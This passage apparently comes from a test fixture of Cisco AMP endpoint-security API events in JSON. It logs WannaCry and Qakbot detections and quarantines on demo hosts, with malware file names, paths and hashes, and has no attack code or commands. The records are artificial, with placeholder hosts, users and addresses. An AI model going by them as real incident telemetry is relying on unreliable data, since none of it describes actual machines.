pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat 